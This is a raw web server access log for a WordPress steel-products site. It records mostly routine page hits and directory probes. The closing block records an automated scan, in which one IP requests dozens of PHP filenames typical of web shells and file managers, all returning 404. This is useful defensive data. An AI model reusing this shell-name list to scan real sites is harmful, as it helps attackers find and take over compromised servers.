3.130.96.91 - - [04/Sep/2025:17:44:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:44:35 +0800] "GET /wp-content/cache/min/1/wp-content/themes/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:44:35 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e6%9d%bf/ HTTP/1.1" 200 22092 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:44:36 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/js/libs/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:45:09 +0800] "GET /2155/ HTTP/1.1" 200 29372 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:45:19 +0800] "GET /wp-content/themes/qizhou/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:45:24 +0800] "POST /wp-cron.php?doing_wp_cron=1756979124.7887349128723144531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.236.230 - - [04/Sep/2025:17:45:24 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:45:24 +0800] "GET /bug/ HTTP/1.1" 200 12812 "http://cqqizhou.com/bug" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:45:25 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:45:31 +0800] "GET /policy/ HTTP/1.1" 200 23548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:45:33 +0800] "GET /2215/ HTTP/1.1" 200 20293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:45:34 +0800] "GET /wp-content/plugins/elementor/assets/lib/animations/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:46:02 +0800] "GET /wp-content/plugins/elementor-pro/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:47:03 +0800] "GET /wp-content/plugins/elementor/assets/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:47:05 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/fonts/revicons/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:47:24 +0800] "GET /club/ HTTP/1.1" 200 13062 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:47:29 +0800] "GET /portfolio/ HTTP/1.1" 200 20553 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:47:39 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/fonts/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:47:43 +0800] "GET /wp-includes/js/jquery/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:47:44 +0800] "GET /wp-includes/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:48:10 +0800] "GET /wp-content/cache/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:48:18 +0800] "POST /wp-cron.php?doing_wp_cron=1756979298.0562429428100585937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.109.54.65 - - [04/Sep/2025:17:48:18 +0800] "GET /comments/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:49:27 +0800] "POST /wp-cron.php?doing_wp_cron=1756979367.6538701057434082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.108.117.45 - - [04/Sep/2025:17:49:27 +0800] "GET /data/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:49:27 +0800] "GET /data/ HTTP/1.1" 200 11831 "http://www.cqqizhou.com/data/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:49:34 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:49:47 +0800] "GET /wp-content/plugins/elementor-pro/assets/css/modules/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:50:03 +0800] "GET /wp-content/uploads/2025/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:50:29 +0800] "GET /wp-content/plugins/elementor/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:50:54 +0800] "GET /about/ HTTP/1.1" 200 30088 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:50:56 +0800] "GET /wp-content/plugins/smartideo/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:51:09 +0800] "POST /wp-cron.php?doing_wp_cron=1756979469.6007130146026611328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.109.31.152 - - [04/Sep/2025:17:51:09 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:51:09 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "http://www.cqqizhou.com/logistics" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:51:10 +0800] "GET /wp-includes/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
120.138.19.65 - - [04/Sep/2025:17:51:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
121.42.252.229 - - [04/Sep/2025:17:51:21 +0800] "GET /wp-content/plugins/wp-rocket/assets/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:51:34 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:51:53 +0800] "GET /wp-includes/js/jquery/ui/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:51:53 +0800] "GET /wp-content/cache/min/1/wp-content/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:52:00 +0800] "GET /wp-content/plugins/elementor/assets/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:52:03 +0800] "POST /wp-cron.php?doing_wp_cron=1756979523.2341160774230957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.252.229 - - [04/Sep/2025:17:52:03 +0800] "GET /contacts/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:52:03 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "http://www.cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:52:20 +0800] "GET /wp-includes/css/dist/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:52:28 +0800] "GET /portfolio-category/cold-rolled-coil/ HTTP/1.1" 200 20900 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:52:36 +0800] "GET /wp-content/cache/min/1/wp-content/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:53:21 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/fonts/revicons/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:53:43 +0800] "GET /wp-content/cache/min/1/wp-content/themes/qizhou/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:53:57 +0800] "POST /wp-cron.php?doing_wp_cron=1756979637.7380681037902832031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.236.230 - - [04/Sep/2025:17:53:57 +0800] "GET /process/processing HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:53:57 +0800] "GET /services/processing/ HTTP/1.1" 200 22903 "http://cqqizhou.com/process/processing" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:54:00 +0800] "GET /portfolio-category/remaining-rolls/ HTTP/1.1" 200 20832 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:54:19 +0800] "GET /bug HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:54:19 +0800] "GET /bug/ HTTP/1.1" 200 12812 "http://www.cqqizhou.com/bug" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:54:36 +0800] "GET /2215/ HTTP/1.1" 200 20293 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:17:54:38 +0800] "GET /2165/ HTTP/1.1" 200 27212 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:17:54:39 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:17:55:05 +0800] "GET /wp-content/cache/min/1/wp-content/themes/qizhou/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:55:15 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 22101 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:55:51 +0800] "POST /wp-cron.php?doing_wp_cron=1756979751.9526550769805908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.42.249.16 - - [04/Sep/2025:17:55:52 +0800] "GET /data/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:17:55:52 +0800] "GET /data/ HTTP/1.1" 200 11831 "http://www.cqqizhou.com/data/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:56:14 +0800] "GET /portfolio-category/hot-dip-galvanized-coil/ HTTP/1.1" 200 20880 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
45.135.193.100 - - [04/Sep/2025:17:56:15 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
121.42.249.16 - - [04/Sep/2025:17:56:43 +0800] "GET /wp-content/plugins/elementor-pro/assets/css/modules/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:57:14 +0800] "GET /wp-content/plugins/elementor/assets/lib/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:57:21 +0800] "GET /wp-content/plugins/revslider/public/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:57:24 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:57:53 +0800] "GET /wp-content/uploads/2025/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.31.152 - - [04/Sep/2025:17:58:04 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/smartideo/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:17:58:20 +0800] "GET /industry/ HTTP/1.1" 200 21890 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:17:58:28 +0800] "GET /wp-content/plugins/elementor-pro/assets/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:17:58:44 +0800] "POST /wp-cron.php?doing_wp_cron=1756979924.2208321094512939453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.33.203.148 - - [04/Sep/2025:17:58:44 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
203.33.203.148 - - [04/Sep/2025:17:58:45 +0800] "GET / HTTP/1.1" 200 33465 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
47.108.117.45 - - [04/Sep/2025:17:59:27 +0800] "GET /wp-content/themes/qizhou/images/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:17:59:44 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:18:00:10 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/contact-form-7/includes/js/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.249.16 - - [04/Sep/2025:18:00:27 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
36.133.115.36 - - [04/Sep/2025:18:01:22 +0800] "POST /wp-cron.php?doing_wp_cron=1756980082.7108929157257080078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
47.109.54.65 - - [04/Sep/2025:18:01:22 +0800] "GET /process/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:18:01:22 +0800] "GET /services/processing/ HTTP/1.1" 200 22903 "http://cqqizhou.com/process/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.108.117.45 - - [04/Sep/2025:18:02:24 +0800] "GET /2165/ HTTP/1.1" 200 27212 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.236.230 - - [04/Sep/2025:18:02:37 +0800] "GET /wp-content/uploads/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.44.73 - - [04/Sep/2025:18:02:51 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
47.109.54.65 - - [04/Sep/2025:18:02:52 +0800] "GET /wp-content/plugins/smartideo/static/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.252.229 - - [04/Sep/2025:18:02:58 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/js/libs/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
121.42.253.62 - - [04/Sep/2025:18:03:13 +0800] "GET /wp-content/cache/min/1/wp-content/plugins/revslider/public/css/fonts/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
139.129.246.141 - - [04/Sep/2025:18:03:33 +0800] "GET /wp-content/plugins/revslider/public/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /pm.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /vxrl.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /live.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /Lux.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /ext.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /shorw.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /gifclass.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:42 +0800] "GET /orm.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /gmo.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /a2.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /ertg.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /jlex3.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /cool.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /13.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /lol.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:43 +0800] "GET /iov.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /bolt.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /as4AaPasd.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /w3llstore.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /shell20250630.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /aaaa.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /wp-gr.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:44 +0800] "GET /ffile.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /trd.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /goh.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /class-t.api.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /tcp.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /ioxi.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /jmfi2.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /zwso.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /jjzsijpj.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:45 +0800] "GET /dex.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /520.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /lupo.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /wp-update.php HTTP/1.1" 404 27 "-" "-"
4.217.161.165 - - [04/Sep/2025:18:03:46 +0800] "GET /weo.php HTTP/1.1" 404 27 "-" "-"
